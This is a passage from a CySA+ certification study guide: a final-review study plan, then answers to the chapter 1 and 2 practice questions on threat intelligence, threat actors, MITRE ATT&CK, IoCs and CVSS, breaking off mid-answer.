Instead of just reading the tables in the various chapters, this
book’s Appendixes C and D give you another review tool.
Appendix C lists partially completed versions of many of the
tables from the book. You can open Appendix C (a PDF
available on the book website after registering) and print the
appendix. For review, you can attempt to complete the tables.
This exercise can help you focus on the review. It also exercises
the memory connectors in your brain, and it prompts you to
think about the information from context clues, which forces a
little more contemplation about the facts.
Appendix D, also a PDF located on the book website, lists the
completed tables to check yourself. You can also just refer to the
tables as printed in the book.
Chapter-Ending Review Tools
Chapters 1 through 21 each have several features in the “Exam
Preparation Tasks” section at the end of the chapter. You might
have already worked through these in each chapter. It can also
be helpful to use these tools again as you make your final
preparations for the exam.
SUGGESTED PLAN FOR FINAL
REVIEW/STUDY
This section lists a suggested study plan that should guide you,
until you take the CompTIA Cybersecurity Analyst (CySA+)
CS0-002 exam. Certainly, you can ignore this plan, use it as is,
or just take suggestions from it.
The plan uses four steps:
Step 1. Review the key topics and the “Do I Know This
Already?” questions: You can use the table that lists
the key topics in each chapter, or just flip the pages
looking for key topics. Also, reviewing the DIKTA quiz
questions from the beginning of the chapter can be
helpful for review.
Step 2. Complete memory tables: Open Appendix C from
the book website and print the entire thing, or print
the tables by major part. Then complete the tables.
Step 3. Review the “Review Questions” sections: Go
through the review questions at the end of each
chapter to identify areas where you need more study.
Step 4. Use the Pearson Test Prep practice test
software to practice: You can use the Pearson Test
Prep practice test software to study by using a bank of
unique exam-realistic questions available only with
this book.
SUMMARY
The tools and suggestions listed in this chapter have been
designed with one goal in mind: to help you develop the skills
required to pass the CompTIA Cybersecurity Analyst (CySA+)
CS0-002 exam. This book has been developed from the
beginning to not just tell you the facts but also help you learn
how to apply them. No matter what your experience level
leading up to when you take the exam, it is my hope that the
broad range of preparation tools and the structure of the book
help you pass the exam with ease. I hope you do well on the
exam.
Appendix A
Answers to the “Do I Know
This Already?” Quizzes and
Review Questions
CHAPTER 1
Do I Know This Already?
1. D. Proprietary/closed-source intelligence sources are those
that are not publicly available and usually require a fee to
access. Examples of this are platforms maintained by private
organizations that supply constantly updating intelligence
information. In many cases this data is developed from all of
the provider’s customers and other sources.
2. A. Trusted Automated eXchange of Indicator Information
(TAXII) is an application protocol for exchanging cyber
threat information (CTI) over HTTPS. It defines two primary
services, Collections and Channels.
3. B. Because zero-day attacks occur before a fix or patch has
been released, it is difficult to prevent them. As with many
other attacks, keeping all software and firmware up to date
with the latest updates and patches is important.
4. C. Hacktivists are activists for a cause, such as animal
rights, that use hacking as a means to get their message out
and affect the businesses that they feel are detrimental to
their cause.
5. B. Collection is the stage in which most of the hard work
occurs. It is also the stage at which recent advances in
artificial intelligence (AI) and automation have changed the
game. It’s time-consuming work that involves web searches,
interviews, identifying sources, and monitoring, to name a
few activities.
6. B. Commodity malware is malware that is widely available
either for purchase or by free download. It is not customized
or tailored to a specific attack. It does not require complete
understanding of its processes and is used by a wide range of
threat actors with a range of skill levels.
7. A. In the healthcare community, where protection of patient
data is legally required by HIPAA, an example of a sharing
platform is H-ISAC (Health Information Sharing and
Analysis Center). It is a global operation focused on sharing
timely, actionable, and relevant information among its
members, including intelligence on threats, incidents, and
vulnerabilities.
Review Questions
1. Possible answers can include the following:
Print and online media
Internet blogs and discussion groups
Unclassified government data
Academic and professional publications
Industry group data
2. Structured Threat Information eXchange (STIX). While
STIX was originally sponsored by the office of Cybersecurity
and Communications within the U.S. Department of
Homeland Security, it is now under the management of the
Organization for the Advancement of Structured
Information Standards (OASIS), a nonprofit consortium that
seeks to advance the development, convergence, and
adoption of open standards for the Internet.
3. STIX: An XML-based programming language that can be
used to communicate cybersecurity data among those using
the language.
OpenIOC: An open framework that is designed for sharing
threat intelligence information in a machine-readable
format.
Cyber Intelligence Analytics Platform (CAP) v2.0:
Uses its proprietary artificial intelligence and machine
learning algorithms to help organizations unravel cyber risks
and threats and enables proactive cyber posture
management.
4. Insider. Insiders who are already inside the network
perimeter and already know the network are a critical
danger.
5. The models are as follows:
Hub and spoke: One central clearinghouse
Source/subscriber: One organization is the single source of
information
Peer-to-peer: Multiple organizations share their information
6. Hacktivists. are activists for a cause, such as animal rights,
that use hacking as a means to get their message out and
affect the businesses that they feel are detrimental to their
causes.
7. Zero-day: Threat with no known solution
APT: Threat carried out over a long period of time
Terrorist: Hacks not for monetary gain but simply to
destroy or deface
8. Nation-state. Nation-state or state sponsors are usually
foreign governments. They are interested in pilfering data,
including intellectual property and research and
development data, from major manufacturers, tech
companies, government agencies, and defense contractors.
They have the most resources and are the best organized of
any of the threat actor groups.
9. Requirements. Before beginning intelligence activities,
security professionals must identify what the immediate
issue is and define as closely as possible the requirements of
the information that needs to be collected and analyzed. This
means the types of data to be sought is driven by what we
might fear the most or by recent breaches or issues. The
amount of potential information may be so vast that unless
we filter it to what is relevant, we may be unable to fully
understand what is occurring in the environment.
10. CISA. The Cybersecurity and Infrastructure Security Agency
(CISA) maintains a number of chartered organizations,
among them the Aviation Government Coordinating
Council.
CHAPTER 2
Do I Know This Already?
1. C. MITRE ATT&CK is a knowledge base of adversary tactics
and techniques based on real-world observations. It is an
open system, and attack matrices based on it have been
created for various industries. It is designed as a foundation
for the development of specific threat models and
methodologies in the private sector, in government, and in
the cybersecurity product and service community.
2. A. Some threat intelligence data is generated from past
activities. Reputational scores may be generated for traffic
sourced from certain IP address ranges, domain names, and
URLs.
3. C. First, you must have a grasp of the capabilities of the
attacker or adversary. Threat actors have widely varying
capabilities. When carrying out threat modeling, you may
decide to develop a more comprehensive list of threat actors
to help in scenario development.
4. B. Security engineering is the process of architecting
security features into the design of a system or set of
systems. It has as its goal an emphasis on security from the
ground up, sometimes stated as “building in security.”
Unless the very latest threats are shared with this function,
engineers cannot be expected to build in features that
prevent threats from being realized.
Review Questions
1.
Corner
Descriptions
Adversary
Describes the intent of the attack
Victim
Describes the target or targets
Capabilitie
s
Describes attacker intrusion tools and techniques
Infrastruct
ure
Describes the set of systems an attacker uses to
launch attacks
2. adversary. Adversary focuses on the intent of the attack.
3. Behavioral. Some threat intelligence data is based not on
reputation but on the behavior of the traffic in question.
Behavioral analysis is another term for anomaly analysis.
4. Indicator of compromise (IoC). An IoC is any activity,
artifact, or log entry that is typically associated with an
attack of some sort.
5. Examples include the following:
Virus signatures
Known malicious file types
Domain names of known botnet servers
An indicator of compromise (IoC) is any activity, artifact, or
log entry that is typically associated with an attack of some
sort.
6.
Acronym
Description
TLP
Set of designations used to ensure that sensitive
information is shared with the appropriate audience
MITR
E
ATT&
CK
Knowledge base of adversary tactics and techniques
based on real-world observations
CVSS
System of ranking vulnerabilities that are discovered
based on predefined metrics
IoC
Any activity, artifact, or log entry that is typically
associated with an attack of some sort
7. Pr:L stands for Privileges Required, where L stands for Low
and the attacker requires privileges that provide basic user
capabilities that could normally affect only settings and files
owned by 
Download